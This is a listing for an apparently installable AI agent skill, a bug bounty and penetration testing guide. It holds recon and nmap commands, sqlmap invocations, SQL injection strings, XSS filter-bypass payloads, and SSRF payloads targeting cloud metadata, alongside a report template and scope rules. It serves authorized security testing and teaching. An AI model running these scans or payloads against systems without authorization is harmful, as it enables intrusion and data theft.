bug-bounty-program

Original🇺🇸 English
Translated

Эксперт по bug bounty. Используй для поиска уязвимостей, написания отчётов, responsible disclosure и penetration testing.

1installs
Sourcedengineproblem/agents-monorepo
Added on

NPX Install

npx skill4agent add dengineproblem/agents-monorepo bug-bounty-program

Tags

Translated version includes tags in frontmatter
bug-bounty-huntingvulnerability-detectionpenetration-testingreport-writingxss-sql-injection-ssrf

SKILL.md Content

View Translation Comparison →

Bug Bounty Program Specialist

Эксперт по исследованию уязвимостей и bug bounty hunting.

Методология тестирования

OWASP Top 10 Focus

  1. Injection (SQL, NoSQL, LDAP, OS commands)
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Распределение усилий

  • Reconnaissance: 30%
  • Manual testing: 50%
  • Automated scanning: 20%

Reconnaissance

Subdomain Enumeration

bash
# Пассивное перечисление
amass enum -passive -d target.com -o subdomains.txt

# Активное перечисление
subfinder -d target.com -all -o subfinder.txt

# DNS брутфорс
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt

# Объединение результатов
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt

Technology Stack Identification

bash
# Wappalyzer CLI
wappalyzer https://target.com

# WhatWeb
whatweb -a 3 https://target.com

# Nuclei technology detection
nuclei -u https://target.com -t technologies/

Port Scanning

bash
# Быстрое сканирование
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full

# Сканирование сервисов
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services

SQL Injection Testing

Manual Detection

sql
-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--

-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--

-- Boolean-based blind
' AND 1=1--
' AND 1=2--

SQLMap

bash
# Basic injection test
sqlmap -u "https://target.com/page?id=1" --batch

# With authentication
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch

# POST data
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch

# Database enumeration
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch

XSS Testing

Payload Types

javascript
// Reflected XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

// DOM-based XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>

// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="&#x61;lert('XSS')">
<svg/onload=alert('XSS')>

// Stored XSS via different contexts
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>

Context-Specific Payloads

javascript
// In HTML attribute
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='

// In JavaScript string
';alert('XSS');//
"-alert('XSS')-"

// In URL parameter
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>

SSRF Testing

Basic Payloads

# Localhost bypass
http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://127.1
http://0177.0.0.1

# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/

Detection Methods

python
# Out-of-band detection using Burp Collaborator
url = "http://your-collaborator-id.burpcollaborator.net"

# Webhook.site for testing
url = "https://webhook.site/unique-id"

Report Writing

Structure

markdown
# Vulnerability Report

## Summary
[One-line description]

## Severity
[Critical/High/Medium/Low] - CVSS Score: X.X

## Affected Component
[URL/Endpoint/Feature]

## Description
[Detailed technical explanation]

## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]

## Proof of Concept
[Screenshots, code, requests]

## Impact
[Business/technical impact]

## Remediation
[Specific recommendations]

## References
[CVE, OWASP, etc.]

CVSS Calculator Factors

  • Attack Vector (AV): Network/Adjacent/Local/Physical
  • Attack Complexity (AC): Low/High
  • Privileges Required (PR): None/Low/High
  • User Interaction (UI): None/Required
  • Scope (S): Unchanged/Changed
  • Confidentiality Impact (C): None/Low/High
  • Integrity Impact (I): None/Low/High
  • Availability Impact (A): None/Low/High

Tools Checklist

Reconnaissance

  • Amass / Subfinder
  • Nmap
  • Shodan
  • Google Dorks

Web Testing

  • Burp Suite
  • OWASP ZAP
  • SQLMap
  • Nuclei

Automation

  • ffuf (fuzzing)
  • httpx (probing)
  • waybackurls
  • gau (URLs gathering)

Ethical Guidelines

  1. Stay in scope — тестируйте только разрешенные цели
  2. Don't be destructive — избегайте DoS и потери данных
  3. Protect data — не распространяйте найденные данные
  4. Report responsibly — следуйте disclosure policy
  5. Document everything — ведите детальные записи
  6. Respect rate limits — не перегружайте системы

Program Selection Strategy

Criteria

  • Response time history
  • Bounty amounts
  • Scope breadth
  • Program maturity
  • Community feedback

Priority Matrix

Program TypeSkill LevelPotential
New programsAnyHigh
Broad scopeIntermediateMedium
Narrow scopeExpertLow-Medium
VDP onlyBeginnerLow